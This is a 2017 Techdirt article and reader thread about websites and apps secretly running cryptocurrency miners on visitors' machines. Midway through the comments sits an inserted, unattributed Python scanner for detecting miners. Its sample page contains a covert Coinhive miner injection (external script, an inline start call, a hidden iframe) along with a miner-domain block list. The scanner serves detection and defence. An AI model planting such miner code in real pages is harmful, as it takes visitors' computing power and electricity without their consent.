Covert Cryptocurrency Miners Quickly Become A Major Problem

from the lessons-unlearned dept

As websites increasingly struggle to keep the lights on in the age of ad blockers, a growing number of sites have turned to bitcoin miners like Coinhive. Such miners covertly use visitor CPU cycles to mine cryptocurrency while a user is visiting a website, and actively market themselves as a creative alternative to the traditional advertising model. And while this is certainly a creative revenue generator, these miners are increasingly being foisted upon consumers without informing them or providing an opt out. Given that the miners consume user CPU cycles and a modest amount of power, that's a problem.

The Pirate Bay was forced to disable its bitcoin miner back in September, after users complained it was eating up to 90% of their available CPU cycles. Showtime was similarly caught using a bitcoin miner on two of its domains, and has yet to provide any detail on why it launched the miners or refused to inform visitors they were running. More recently, Trend Micro unveiled that at least two Android apps -- downloaded up to 50,000 times from the Google Play store -- were covertly putting crypto miners inside a hidden browser window:

Recently, we found apps with malicious cryptocurrency mining capabilities on Google Play. These apps used dynamic JavaScript loading and native code injection to avoid detection. We detect these apps as ANDROIDOS_JSMINER and ANDROIDOS_CPUMINER.

[...]

This JavaScript code runs within the app’s webview, but this is not visible to the user because the webview is set to run in invisible mode by default. When the malicious JavaScript code is running, the CPU usage will be exceptionally high.

The explosion in bitcoin miners is both above and below board. There are indications that the bitcoin miners running on Showtime's domains were the result of a website hack. More recently, researchers from security firm Sucuri discovered that at least 500 websites running WordPress had been hacked, and that other publishing platforms including Magento, Joomla, and Drupal were also being consistently abused. Reddit users this week documented how Choice Hotels (owner of Comfort Inn) websites have also been compromised with cryptocurrency miners the company itself seems oblivious to.

Political fact-checking website PolitiFact also recently acknowledged it was hacked by intruders who installed bitcoin miners that quickly gobbled up visitors' CPU cycles without permission:

Not too surprisingly, security firms like Malwarebytes have started blocking the miners:

The reason we block Coinhive is because there are site owners who do not ask for their users' permission to start running CPU-gorging applications on their systems. A regular Bitcoin miner could be incredibly simple or a powerhouse, depending on how much computing the user running the miner wants to use. The JavaScript version of a miner allows customization of how much mining to do, per user system, but leaves that up to the site owner, who may want to slow down your computer experience to a crawl.

And while these tools help somewhat with malicious installs and hacks, plenty of websites still appear to think it's a good idea to run the miners without notifying users or providing a functioning opt out. Which means there are plenty of folks busy trying to combat the rise of ad blockers by engaging in the exact same behavior that caused the rise of ad blockers in the first place.


Reader Comments



  • Roger Strong (profile), 15 Nov 2017 @ 12:27pm

    The problem of people discovering bitcoin miners in web sites should go away shortly.

    Mostly because all the major browsers finally support WebAssembly. JavaScript (and C++ and other languages) can now be sent to your browser in compiled form, making it much harder to figure out what they're doing.

    So, yay?

    • Anonymous Coward, 15 Nov 2017 @ 12:33pm

      Re:

      Are there estimates of how much money can be made here? To simplify, we could assume the scripts will run as fast as a native CPU implementation... which I thought had been considered dead for a long time now, at least for Bitcoin, because there's little money to be made that way (even with unmetered electricity).

      • Roger Strong (profile), 15 Nov 2017 @ 12:45pm

        Re: Re:

        It would depend on how many people visit the web site.

        Imagine Netflix doing this. "Your ISP is limiting your video stream to Standard Definition. It would be a shame to waste all that GPU capability, so we'll just have the video codec also mine bitcoin while you're watching. Cheers!"

        • Anonymous Coward, 15 Nov 2017 @ 1:54pm

          Re: Re: Re:

          If they make Netflix free and commercial free then I might agree with it! I rarely use anything else on my PC while nutflix is running.

          • Anonymous Coward, 15 Nov 2017 @ 2:04pm

            Re: Re: Re: Re:

            You'd be paying with your own computer components' lifespan, at the very least, though. If these miners take up to 90% of your processing power, you become limited in what else you can do with your machine, and it wears down your (likely expensive) CPU.

            As well, who's to say Netflix will turn the mining off once you're done watching?

            • Anonymous Coward, 15 Nov 2017 @ 2:10pm

              Re: Re: Re: Re: Re:

              I can buy a cheap CPU just to watch shows, but if they try to keep mining while I am not watching or mining in a way that disrupts my enjoyment then deal is off.

              I don't think mining coin on peeps CPU is a problem, as long as the users KNOW and have explicitly agreed to it and as long as there is a fair exchange of value.

              Heck, I might let my machine sit and crunch for them if I get fair compensation in return.

              In short, as long as all parties know & agree, then it's not a problem. What I feel is fair compensation may not be what another feels is fair compensation, but that needs to be their decision.

            • Anonymous Coward, 16 Nov 2017 @ 3:58am

              Re: Re: Re: Re: Re:

              wears down your (likely expensive) CPU

              CPUs are not generally considered to "wear down" with usage, as long as they're properly cooled. There should be no real effect on lifespan. Even servers used at 100% for years, as in scientific clusters, are retired because more efficient computers come along, not because they've worn out.

    • Rich Kulawiec, 15 Nov 2017 @ 12:52pm

      Re:

      Well, that's disturbing. I suppose it's only a matter of time until miners are embedded in otherwise-legitimate code served by otherwise-legitimate sites.

      • Roger Strong (profile), 15 Nov 2017 @ 1:13pm

        Re: Re:

        We automatically remove encrypted PDF files from incoming and outgoing email, except for a VERY small whitelist of sources. This is because Adobe added JavaScript support to PDF files, making them God's gift to ransomware criminals.

        I expect someone is already looking at embedding JavaScript bitcoin miners in PDF files. Device and app manuals, pirated eBooks, electronic invoices, etc.

        Or non-pirated eBooks. Add it to fanfic, put a cheap price on it and upload it to the eBook stores. A reader might have it open for hours, rather than a quick website visit.

        I wonder if you could bypass the malware detection in the Apple or Android stores by uploading a perfectly clean app, with the bitcoin miner in the PDF manual.

    • Anonymous Coward, 15 Nov 2017 @ 1:58pm

      Re:

      Shite. By that description, the code sent by this protocol is probably not auditable in any sense of the word, correct?

      • Roger Strong (profile), 15 Nov 2017 @ 2:12pm

        Re: Re:

        Decompilers exist for many languages. If it can be compiled into bytecode, then it can be decompiled back into something *somewhat* readable. Though never as readable as the original code.

        Since code obfuscators exist for other environments to derail decompile efforts, I expect they'll quickly be created for WebAssembly.

    • Rekrul, 16 Nov 2017 @ 9:01am

      Re:

      Mostly because all the major browsers finally support WebAssembly. JavaScript (and C++ and other languages) can now be sent to your browser in compiled form, making it much harder to figure out what they're doing.

      What a great idea! Let's make it even easier for web sites to covertly run code on users' systems! I'm sure this will never be abused...

  • Anonymous Coward, 15 Nov 2017 @ 12:29pm

    "Malicious"

    And while these tools help some with malicious installs and hacks, plenty of websites still appear to think it's a good idea to run the miners without notifying users or providing a functioning opt out.

    Uh, they're not doing that out of malice (i.e. a desire to harm their users), they're doing it out of greed. An infinite loop would be easier and work just as well for malice. This is nonmalicious sociopathy, par for the course on the web (and an opt-out option wouldn't change this).

    • Anonymous Coward, 15 Nov 2017 @ 12:48pm

      Re: "Malicious"

      "Malicious"
      The Latin root word mal means “bad” or “evil.” This root is the word origin of many English vocabulary words, including malformed, maltreat, and malice. You can recall that mal means “bad” through malfunction, or a “badly” working part, and that it means “evil” through malice, or intentional “evil” done to another.

      It's just bad, m'kay?

      • Anonymous Coward, 15 Nov 2017 @ 7:13pm

        Re: Re: "Malicious"

        The Latin root word mal means “bad” or “evil."

        And malice specifically means an intent to do evil or to harm others. I don't think the people running these scams give a shit about others. They've probably even got some justification so as not to consider themselves wrongdoers.

    • Anonymous Coward, 15 Nov 2017 @ 3:58pm

      Re: "Malicious"

      Greed is malicious

  • GMacGuffin (profile), 15 Nov 2017 @ 12:40pm

    ... probably not bitcoin

    Bitcoin's difficulty has long been too high to mine on a CPU or GPU. You essentially need specialized ASIC machines to mine bitcoin; racks of them unless you join a pool.

    CoinHive's JavaScript miner mines monero, which is a wonderful, privacy-centric cryptocurrency -- but it is not bitcoin (the original cryptocurrency).

    Just a point of clarity. "Bitcoin" is not generic for cryptocurrency; bitcoin is a specific cryptocurrency.

  • Anonymous Cowherd, 15 Nov 2017 @ 12:45pm

    #NoScript

    • Anonymous Howard, 15 Nov 2017 @ 1:38pm

      Re:

      RIP most Firefox extensions

    • John85851 (profile), 16 Nov 2017 @ 10:07am

      Re:

      #UnusableSite

      In all seriousness, way too many companies are designing their websites to be unusable unless JavaScript is enabled.
      Want to read the article? Enable JavaScript so the formatting isn't screwed up.
      Want to see the images in the article? Enable JavaScript to see them.
      Want to leave a comment on the article? Enable JavaScript so the page will display the Facebook commenting system.

  • ShadowNinja (profile), 15 Nov 2017 @ 12:46pm

    NEVER consent to crypto-currency mining on your computer by a website

    I can't believe how many people I've seen at sites like reddit saying that these miners might be a good alternate to web ads, it's like they can't think ahead a few steps.

    For the non-computer literate, here's why bitcoin mining in place of ads is a bad idea, even with user permission.

    • We're not talking about just one site using it. We're talking about the potential for many of the websites you visit to start using it in place of ads. Even people with top of the line computers will find their computers brought to their knees if they have enough websites open running crypto-currency miners.

    • What's to stop people from just running crypto-currency miners? This loophole to covertly mine crypto-currency is a GREAT way for a would-be hacker to potentially do other malicious things to your computer too. I GUARANTEE you we'll hear about some nasty virus in the future disguising itself as a mining app.

    • Do some googling on why crypto-currency mining isn't financially worth it. A big reason why is because of the added cost to your electric bill when running your computer full force on crypto-currency mining. So yes, these crypto-currency miners COST you money. They're in effect stealing your electricity (and probably bandwidth too, which is relevant if you don't have unlimited data with no throttling).

    This is why I immediately added crypto-currency mining to my block list in uBlock Origin the second I heard of the first story of these miner leeches.

    • Anonymous Coward, 15 Nov 2017 @ 1:07pm

      Re: NEVER consent to crypto-currency mining on your computer by a website

      Well. Just HOW are you going to prevent the obvious disaster? The sites have powerful incentive to spread this, no legal limitations, billions of knuckleheads going along, and on your side is... what?

      "it's like they can't think ahead a few steps." -- Wrong! It's not "like", it's THAT, AND WON'T. --

      Now, do you rail at Google using javascript to gain money? Why not? Same principle, and why I rail here at Google. But it's like you can't think ahead a few steps...

      • Anonymous Coward, 15 Nov 2017 @ 9:40pm

        Re: Re: NEVER consent to crypto-currency mining on your computer by a website

        But when the RIAA and NSA vacuum up info to sue children, there's no cock you won't deepthroat, eh blue boy?

    • Anonymous Coward, 15 Nov 2017 @ 7:35pm

      Re: NEVER consent to crypto-currency mining on your computer by a website

      I can't believe how many people I've seen at sites like reddit saying that these miners might be a good alternate to web ads, it's like they can't think ahead a few steps.

      And what ever makes them think that mining would only be "instead of" and not wind up "in addition to" ads? Idiots.

    • Anonymous Coward, 16 Nov 2017 @ 2:46am

      Re: NEVER consent to crypto-currency mining on your computer by a website

      Still, miners have an advantage over ads: they lack a whole row of middle-men that take their share of the goods (ad brokers, ad creators, etc.)

      Both ads and miners have the risk that they will behave like parasites to the host -- gobbling up bandwidth, power, and attention. But with miners, I can imagine a future where miners will play nice, use limited resources, and become a kind of micropayment for using the website.

  • Anonymous Coward, 15 Nov 2017 @ 12:50pm

    But you don't mind Google mining info bits to track you?

    Never allow JavaScript, maliciously engineered from the start, unless absolutely required. Get NoScript -- and remove the whitelist it comes with, especially Google.

    However, since you can't turn off JavaScript in many browsers now, just admire the infernal ingenuity of your high-tech prison...

    • Anonymous Coward, 15 Nov 2017 @ 12:55pm

      Re: But you don't mind Google mining info bits to track you?

      k

      • Anonymous Coward, 15 Nov 2017 @ 1:11pm

        Re: Re: But you don't mind Google mining info bits to track you?

        >>> k

        Evidently Techdirt fanboys are down to one character replies.

        • Anonymous Coward, 15 Nov 2017 @ 1:48pm

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          Best use of time.

        • Anonymous Coward, 15 Nov 2017 @ 4:26pm

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          What else is there to say to a troll with a Google obsession?

          k

        • Anonymous Coward, 15 Nov 2017 @ 5:14pm

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          Filthy TOR pirate says what?

          • Anonymous Coward, 16 Nov 2017 @ 1:24am

            Re: Re: Re: Re: But you don't mind Google mining info bits to track you?

            really? tor?

            Apparently you're living in 2016....

            You can get entirely de-centralized websites now, where the entire HTML codebase is held on multiple machines.

            Tor not required, as to prevent Dcent sites you'd basically need to block 99% of all IP addresses to be sure..

            • Anonymous Coward, 17 Nov 2017 @ 7:20pm

              Re: Re: Re: Re: Re: But you don't mind Google mining info bits to track you?

              This would have a point if not for the fact that out_of_the_blue has readily admitted on multiple occasions to using TOR solely for the purposes of trolling a site he absolutely loathes.

        • Matthew Cline (profile), 16 Nov 2017 @ 2:19am

          Re: Re: Re: But you don't mind Google mining info bits to track you?

          "Why aren't you talking about what I want you to talk about" isn't worth responding to.

    • Anonymous Coward, 15 Nov 2017 @ 1:33pm

      Re: But you don't mind Google mining info bits to track you?

      Although the ability to disable JavaScript was taken out of the settings/options control panel in web browsers a few years ago, that just means you have to manually edit it (e.g., "about:config" in Firefox).

      But then disabling JavaScript means that you can't see any of those hidden ("flagged") comments in Techdirt, the non-PC opinions which are often the most truthful and informative comments, as well as the most discussed and debated.

      • Anonymous Coward, 15 Nov 2017 @ 7:16pm

        Re: Re: But you don't mind Google mining info bits to track you?

        But then disabling JavaScript means that you can't see any of those hidden ("flagged") comments in Techdirt

        Does disabling stylesheets not work any longer? (Of course it would be better for Techdirt to fix that problem so it's not necessary.)

        The Tor Browser security slider is another way to disable JavaScript. At "high" it's blocked.

      • Anonymous Coward, 16 Nov 2017 @ 7:50am

        Re: Re: But you don't mind Google mining info bits to track you?

        I recommend allowing for two separate instances of a browser and then configuring them as you please.

  • Anonymous Coward, 15 Nov 2017 @ 1:04pm

    "Are there estimates of how much money can be made here?"

    Doesn't really matter. If a company makes anything, it is pure profit because they are using visitors' processors and energy. Zero costs and any payoff means a good ROI.

  • Anonymous Coward, 15 Nov 2017 @ 1:35pm

    It's stories like this that make me miss the "Punch the Monkey, Win an iPod" ads from yesteryear.

  • blademan9999 (profile), 15 Nov 2017 @ 3:25pm

    Possible wrong link

    Both of the first two links link to the same article.
    Was that intentional?
    That article does mention both Pirate Bay and Showtime though...

  • Anonymous Coward, 15 Nov 2017 @ 4:00pm

    "This JavaScript code "

    Ahhhh Ha - and there is the problem.

  • tom (profile), 15 Nov 2017 @ 4:46pm

    A site I frequent had this installed somehow. They removed it as soon as folks notified them. Used the web developer tools in Firefox to view the site code. Saw the call to the coinhive domain. Between Malwarebytes and Noscript, the coinhive thing never had a chance to fire off on my PC.

    Added Coinhive.com to the always block rule on my stand alone firewall appliance as another layer of defense.

    It is crap like this that totally destroys the "But we have to have auto load via javascript ads in order to survive" arguments many websites make. If you can't secure your main page, how are you going to secure the automated sell to highest bidder auto load script ad?

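The indicators this thread describes (a script or frame fetched from the coinhive domain, which tom spotted in the Firefox developer tools; the invisible webview in the Trend Micro quote; an inline call that starts the miner) can be checked statically, before any of a page's scripts run. The scanner below is an added example, not code from Techdirt, Coinhive, Malwarebytes or any tool named here: only coinhive.com comes from the article, the sample page and its script paths are constructed, and the CoinHive.Anonymous(...).start() call shape is an assumption about that library's API.

```python
# Added example for this article, not Techdirt's, Coinhive's or any named tool's
# code. Only coinhive.com comes from the article; the sample page, its paths and
# the CoinHive.Anonymous(...).start() API shape are constructed/assumed.
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Only coinhive.com is named in the article; a real deployment would use a
# maintained list (uBlock Origin, Malwarebytes) instead of a single entry.
MINER_DOMAINS = frozenset({"coinhive.com"})
# Both present in one inline script => a miner is being started (assumption
# about the library: a global "CoinHive" object with a start() method).
INLINE_MARKERS = ("coinhive", ".start(")

def host_matches(url, domains=MINER_DOMAINS):
    """Host equals a listed domain or is a subdomain of it. The dot boundary
    matters: notcoinhive.com and coinhive.com.example.net must not match."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in domains)

def looks_hidden(attrs):
    """Heuristic for the invisible frame the Trend Micro quote describes."""
    style = attrs.get("style", "").replace(" ", "").lower()
    return ("display:none" in style or "visibility:hidden" in style
            or attrs.get("width") == "0" or attrs.get("height") == "0"
            or "hidden" in attrs)

class MinerScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []          # list of (kind, evidence) tuples
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {k: ("" if v is None else v) for k, v in attrs}
        src = attrs.get("src", "")
        if tag == "script":
            self._in_inline_script = not src  # only src-less scripts carry a body
            if src and host_matches(src):
                self.findings.append(("external-script", src))
        elif tag == "iframe" and src and host_matches(src):
            kind = "hidden-iframe" if looks_hidden(attrs) else "iframe"
            self.findings.append((kind, src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies to handle_data as raw text.
        if self._in_inline_script:
            body = data.lower()
            if all(marker in body for marker in INLINE_MARKERS):
                self.findings.append(("inline-miner-start", data.strip()[:80]))

def scan_html(html):
    """Return [(kind, evidence), ...] for one HTML document."""
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample: loads the miner library, starts it inline at a 10%
# throttle, and hides a second copy in an invisible frame; the CDN script is benign.
SAMPLE_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.1});
  miner.start();
</script>
</head><body>
<iframe src="https://coinhive.com/media/miner.html" style="display:none"></iframe>
<script src="https://cdn.example.org/app.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, evidence in scan_html(SAMPLE_PAGE):
        print(f"{kind:20s} {evidence}")
```

Run it over fetched HTML or a browser's saved page source; the domain list should be the same one you feed uBlock Origin or a perimeter firewall, as tom describes, so that the static check and the runtime block agree.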

  • Anonymous Coward, 16 Nov 2017 @ 5:02am

    It is a less intrusive model than advertising

    I can understand that there are some teething problems. But crypto mining is certainly less malicious than the psychological battery being perpetrated on the public by ad-tracking.

    If the client side allocates a core specifically for this, then they should be fine. The problem people are experiencing with latency is likely mostly due to shitty thread handling in browser implementations, and shitty cracking code in the early versions of this tech.

    That hopefully will get solved as the tech standardizes. The problem is that sites will use both, instead of using one or the other.

    It would be nice to see a webring that moves entirely over to this tech, and abandons web based advertising completely. I would totally prefer sites do this, instead of web based ads.

    The only way that advertising survives AI based filtering is if the computers themselves are only rented. And I'm sure there are some lobbyists and congressmen actively working on pursuing just such a crime against the Constitution.

    So we'll see. My guess is it will be a crime to release software in the near future, unless it has first gone through some kind of "federal modification" process. When I was a kid I had a T-shirt that said "skateboarding is not a crime". Now I expect I will soon have one that says "programming is not a crime". Funny how things stay the same.

    • takitus (profile), 16 Nov 2017 @ 6:12am

      Re: It is a less intrusive model than advertising

      This raises an interesting question—if a web service is going to waste cycles, would you rather have those cycles go toward mining currency or your browsing habits? Resource usage being equal, the former might be preferable.

      That said, I’d hardly call it “nice” to be asked to “allocate a core” for currency mining to view a bit of HTML.

  • Rekrul, 16 Nov 2017 @ 9:09am

    Since I removed my front door for convenience, I'm having a hard time keeping burglars out. Someone should really invent something that will keep unwanted people from just walking into your home!

  • Anonymous Coward, 16 Nov 2017 @ 5:27pm

    Not a bigger problem than corrupt politicians and banksters.
